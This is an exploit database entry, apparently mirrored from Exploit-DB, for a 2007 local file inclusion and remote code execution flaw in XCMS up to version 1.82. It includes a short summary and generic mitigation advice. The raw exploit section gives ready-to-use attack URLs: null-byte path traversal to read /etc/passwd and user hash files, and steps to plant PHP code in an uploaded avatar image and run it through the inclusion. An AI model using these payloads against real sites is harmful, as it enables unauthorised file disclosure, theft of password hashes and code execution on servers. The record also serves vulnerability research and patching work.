XCMS LFI & RCE Exploit

vendor:

XCMS

by:

Nexen

5.5

CVSS

MEDIUM

LFI (Local File Inclusion) and RCE (Remote Code Execution)

CWE

Product Name: XCMS

Affected Version From: 1

Affected Version To: 1.82

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

This exploit allows an attacker to perform local file inclusion and remote code execution on the XCMS version 1.82. The exploit involves manipulating the 'pg' parameter in the index.php file to access sensitive files on the server and execute arbitrary code. The exploit also mentions a hash disclosure vulnerability that allows an attacker to access user hashes. To achieve RCE, the attacker needs to upload an image with a PHP code binded and then use the LFI vulnerability to execute the code.

Mitigation:

To mitigate this vulnerability, it is recommended to update XCMS to a version that is not affected by this exploit. Additionally, restricting access to sensitive files and directories and implementing proper input validation can help prevent LFI and RCE attacks.

Source

Exploit-DB raw data:

#  _ __   _____  _____ _ __
# | '_ \ / _ \ \/ / _ \ '_ \
# | | | |  __/>  <  __/ | | |
# |_| |_|\___/_/\_\___|_| |_|
# XCMS <= 1.82 LFI & RCE Xpl
# Nexen rocked this one ;)
# LFIs
http://127.0.0.1/xcms/index.php?pg=admin&s=../../../../../etc/passwd\0
http://127.0.0.1/xcms/index.php?mod=[existing module]&pg=../../../../../etc/passwd\0

# Hash disclosure
http://127.0.0.1/xcms/index.php?mod=[existing module]&pg=../../dati/membri/[username].dtb\0

# RCE:
Doing RCE is more difficult, you must have an image with a php code binded (you can use edjpgcom to do that)
now upload that image on your panel, and exploit rce trough lfi:

http://127.0.0.1/xcms/index.php?mod=[existing module]&pg=../../uploads/avatar/[your_username].jpg\0

# milw0rm.com [2007-12-28]